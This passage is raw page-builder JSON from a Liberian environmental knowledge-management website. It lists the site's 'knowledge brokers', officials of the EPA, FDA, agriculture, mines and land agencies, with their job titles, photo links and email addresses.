id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd05ae4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/wonpue.jpg\",\"id\":5091,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant 